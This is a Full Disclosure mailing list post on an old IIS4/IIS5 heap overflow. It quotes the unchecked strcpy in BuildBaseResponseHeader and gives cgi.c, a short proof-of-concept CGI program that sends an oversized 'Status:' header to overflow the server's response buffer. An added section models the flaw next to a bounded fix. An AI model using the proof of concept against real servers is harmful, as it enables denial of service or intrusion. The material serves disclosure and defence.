Full Disclosure mailing list archives
iis4\iis5 older bug
From: yuange <yuange1975 () hotmail com>
Date: Tue, 28 Dec 2010 12:16:41 +0000
http://hi.baidu.com/yuange1975/blog/item/6242cfa9f651fbee1e17a2f6.html

HTTP_REQ_BASE::BuildBaseResponseHeader( BUFFER * Response, ... STR * pstr, ... )
{
    ......
    if ( !pstr ) {
    } else {
        strcpy( (CHAR *) Response->Ptr(), pstr->Str() ); // buffer overflow, heap overflow
        ......
    }

/* cgi.c ver1.0  iis4.0, iis5.0 overflow program  copy by yuange 2003.1.3 */
#include <windows.h>
#include <stdio.h>
#include <string.h>   /* memset */

#define BUFFSIZE 0x4000

int main(int argc, char **argv)
{
    char buff[BUFFSIZE];

    memset(buff, 'a', BUFFSIZE);          /* fill the whole buffer with 'a' */
    memset(buff + BUFFSIZE - 1, 0, 1);    /* NUL-terminate the last byte */
    /* emit an oversized CGI "Status:" header line, then the blank line that ends the headers */
    printf("Status:200ok%s\r\n\r\n\r\n\n\n", buff);
    return(0);
}
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
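The copy pattern quoted from BuildBaseResponseHeader, modelled in plain C next to a bounded replacement. This is an added example, not IIS source and not the poster's code: the buffer size RESPONSE_BUF_SIZE, the function names, and the constructed CGI output (shaped like what the cgi.c above prints) are assumptions for illustration.

```c
/* Added example, not IIS source or the poster's code. RESPONSE_BUF_SIZE,
 * the function names and the sample CGI output are assumptions. */
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RESPONSE_BUF_SIZE 4096 /* assumed size of the fixed response buffer */

/* The quoted pattern: the CGI-supplied status string is strcpy'd into a
 * fixed heap buffer with no length check, so a line of RESPONSE_BUF_SIZE
 * bytes or more writes past the end. Kept for contrast only; never call
 * this with untrusted input. */
void build_header_unbounded(char *response, const char *status)
{
    if (status != NULL)
        strcpy(response, status);
}

/* Bounded replacement: copy only when the string and its NUL fit,
 * otherwise refuse (truncating a header silently is the wrong fix). */
int build_header_bounded(char *response, size_t response_size,
                         const char *status)
{
    size_t n;
    if (status == NULL || response_size == 0)
        return -1;
    n = strlen(status);
    if (n >= response_size)
        return -1;
    memcpy(response, status, n + 1);
    return 0;
}

/* Extract the first CGI header line (up to CR or LF) into out, bounded by
 * out_size. Returns the line length, or -1 if it does not fit. This is the
 * check the server should make before the copy above. */
int cgi_first_line(const char *cgi_output, char *out, size_t out_size)
{
    size_t n;
    if (cgi_output == NULL || out_size == 0)
        return -1;
    n = strcspn(cgi_output, "\r\n");
    if (n >= out_size)
        return -1;
    memcpy(out, cgi_output, n);
    out[n] = '\0';
    return (int)n;
}

/* Constructed input with the same shape as the post's cgi.c output:
 * "Status:200ok", then `fill` 'a' bytes, then a blank line. Caller frees. */
char *make_cgi_output(size_t fill)
{
    const char *prefix = "Status:200ok";
    const char *suffix = "\r\n\r\n";
    size_t plen = strlen(prefix), slen = strlen(suffix);
    char *buf = malloc(plen + fill + slen + 1);
    if (buf == NULL)
        return NULL;
    memcpy(buf, prefix, plen);
    memset(buf + plen, 'a', fill);
    memcpy(buf + plen + fill, suffix, slen + 1);
    return buf;
}

/* Safe path end to end: 0 when the CGI status line was accepted,
 * -1 when it was rejected as too long for the response buffer. */
int handle_cgi_output(const char *cgi_output)
{
    char line[RESPONSE_BUF_SIZE];
    char response[RESPONSE_BUF_SIZE];
    if (cgi_first_line(cgi_output, line, sizeof line) < 0)
        return -1;
    return build_header_bounded(response, sizeof response, line);
}

int main(void)
{
    char *big = make_cgi_output(0x4000 - 1); /* same length cgi.c above emits */
    char *ok = make_cgi_output(0);
    if (big == NULL || ok == NULL)
        return 1;
    printf("oversized status line: %s\n",
           handle_cgi_output(big) == 0 ? "accepted" : "rejected");
    printf("normal status line:    %s\n",
           handle_cgi_output(ok) == 0 ? "accepted" : "rejected");
    free(big);
    free(ok);
    return 0;
}
```

The oversized line from the cgi.c above is rejected before any copy into the response buffer, while a short "Status:" line passes; the length check has to sit on the server side, since the CGI binary controls the whole header block.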
Current thread:
- iis4\iis5 older bug yuange (Dec 28)